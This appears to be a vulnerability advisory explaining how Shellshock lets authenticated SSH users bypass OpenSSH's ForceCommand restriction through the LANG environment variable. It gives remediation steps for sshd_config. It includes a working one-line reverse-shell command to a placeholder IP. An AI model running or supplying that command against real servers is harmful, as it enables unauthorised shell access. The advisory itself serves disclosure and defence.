Synopsis:
The sshd daemon used in OpenSSH supports a ForceCommand directive, allowing shell logins to be restricted to specific commands. This is often used in configuring sshd for cvs/git accounts, restricted shells, or management scripts. The ForceCommand directive can be employed system wide, or just for specific users.
Vulnerability:
By default, sshd is configured to allow the LANG environment variable to be pass through prior to execution of the restricted shell. On systems vulnerable to the bash/shellshock vulnerability, LANG can be set in such a way that spawns a remote shell or executes other code on the server, effectively bypassing the forced command and allowing full account access. This can be taken advantage of after the user has authenticated via ssh, and so such systems are only at risk from abuse by their own authorized users, however such users are normally restricted from being able to execute arbitrary commands, and so this is more of a privilege escalation in such cases. This vulnerability can be even more dangerous on systems with open restricted accounts, in which case it becomes an RCE risk.
The following code invokes an ssh session that will use shellshock to spawn a remote shell on port 8000 to the IP address at A.B.C.D.
$ env LANG='() { :; }; /bin/bash -i >& /dev/tcp/A.B.C.D/8000 0>&1' ssh target_host
Local demonstration on Mac OS X Mavericks:
Demonstrated remotely on a vulnerable Linux machine:
Recommendations:
It is recommended that the following AcceptEnv directives be removed from sshd_config:
AcceptEnv LANG LC_*
Other standard installations of OpenSSH also include other AcceptEnv directives, which should be removed. For example, many Linux distributions also accept LANGUAGE, XMODIFIERS, and other environment variables. This will prevent sshd from passing through the LANG and related environment variables to the forced command. Other environment variables may still be affected, however, and so a full solution is to patch for the shellshock vulnerability.